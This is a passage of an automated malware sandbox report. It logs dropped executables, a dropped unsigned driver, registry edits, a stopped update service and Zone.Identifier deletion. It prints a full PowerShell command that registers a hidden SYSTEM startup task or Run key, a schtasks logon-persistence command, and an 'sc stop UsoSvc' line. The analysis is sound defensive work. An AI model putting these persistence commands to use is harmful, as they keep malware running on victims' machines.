Source: C:\Windows\System32\conhost.exe	Code function: 22_2_000001C25C75ACDD push rcx; retf 003Fh	22_2_000001C25C75ACDE
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_000001C25C78C6DD push rcx; retf 003Fh	22_2_000001C25C78C6DE
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD599ACDD push rcx; retf 003Fh	63_2_0000017CD599ACDE
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5ADC6DD push rcx; retf 003Fh	63_2_0000017CD5ADC6DE
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5B09B0D push rcx; retf 003Fh	63_2_0000017CD5B09B0E
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5B3A70D push rcx; retf 003Fh	63_2_0000017CD5B3A70E
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5B6ACDD push rcx; retf 003Fh	63_2_0000017CD5B6ACDE
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5B9C6DD push rcx; retf 003Fh	63_2_0000017CD5B9C6DE
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Code function: 66_2_0000023E07F0ACDD push rcx; retf 003Fh	66_2_0000023E07F0ACDE
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Code function: 66_2_0000023E07F89B0D push rcx; retf 003Fh	66_2_0000023E07F89B0E
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Code function: 66_2_00007FF62DC41394 push qword ptr [00007FF62DC4C004h]; ret	66_2_00007FF62DC41403
Source: C:\Windows\System32\conhost.exe	Code function: 68_2_000001A645CEACDD push rcx; retf 003Fh	68_2_000001A645CEACDE
Source: C:\Windows\System32\conhost.exe	Code function: 68_2_000001A645EFC6DD push rcx; retf 003Fh	68_2_000001A645EFC6DE

Persistence and Installation Behavior

Sample is not signed and drops a device driver

Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe

File created: C:\Windows\TEMP\dsarrsulkovb.sys

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe

Source: C:\Users\user\Desktop\GR55Qg1hth.exe	File created: C:\Program Files\Cuis\bon\Bara.exe	Jump to dropped file
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	File created: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Jump to dropped file
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	File created: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Jump to dropped file
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	File created: C:\Windows\Temp\dsarrsulkovb.sys	Jump to dropped file
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	File created: C:\Users\user\Desktop\GR55Qg1hth.exe	Jump to dropped file
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	File created: C:\Users\user\AppData\Local\Temp\FA9.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	File created: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Jump to dropped file
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	File created: C:\Users\user\Desktop\F4R5fd8grr.exe	Jump to dropped file

Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe

File created: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe

Jump to dropped file

Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe

File created: C:\Windows\Temp\dsarrsulkovb.sys

Jump to dropped file

Boot Survival

Uses Register-ScheduledTask to add task schedules

Source: C:\Users\user\Desktop\GR55Qg1hth.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\F4R5fd8grr.exe

Process created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\user\Desktop\F4R5fd8grr.exe" /rl HIGHEST /f

Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe

Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Users\user\Desktop\GR55Qg1hth.exe

Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\FA9.TMP

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\F4R5fd8grr.exe	File opened: C:\Users\user\Desktop\F4R5fd8grr.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	File opened: C:\Users\user\AppData\Roaming\SubDir\Client.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	File opened: C:\Users\user\AppData\Roaming\SubDir\Client.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	File opened: C:\Users\user\Desktop\F4R5fd8grr.exe:Zone.Identifier read attributes \| delete

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Windows\System32\sc.exe

Code function: 63_2_0000017CD5B21F30 GetCurrentThread,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,

63_2_0000017CD5B21F30

Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
